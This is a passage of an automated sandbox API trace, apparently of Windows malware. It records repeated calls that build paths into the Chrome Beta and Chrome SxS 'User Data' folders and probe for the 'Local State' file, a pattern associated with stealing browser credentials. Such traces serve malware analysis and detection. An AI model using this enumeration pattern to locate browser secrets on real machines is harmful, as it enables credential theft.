param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.718] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.718] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.718] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.718] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.718] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.718] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.718] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.718] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.718] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.718] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.718] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.718] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.718] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.718] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.719] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.719] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.719] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.719] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.719] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.719] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.719] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.719] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.719] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.719] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.719] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.719] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.719] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.719] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.720] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Google\\Chrome SxS\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data" [0174.720] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data" [0174.720] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Local State" [0174.720] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\local state")) returned 0xffffffff [0174.720] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*") returned 65 [0174.720] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x720065, ftCreationTime.dwLowDateTime=0x440020, ftCreationTime.dwHighDateTime=0x740061, ftLastAccessTime.dwLowDateTime=0x5c0061, ftLastAccessTime.dwHighDateTime=0x6f004c, ftLastWriteTime.dwLowDateTime=0x610063, ftLastWriteTime.dwHighDateTime=0x20006c, nFileSizeHigh=0x740053, nFileSizeLow=0x740061, dwReserved0=0x65, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.720] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.720] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.720] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.720] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.720] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.720] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.720] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.721] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.721] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.721] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.721] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.721] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.721] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.721] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.721] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.721] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.721] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.721] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.721] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.721] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.721] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.721] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.721] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.722] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.722] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.722] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.722] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.722] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: 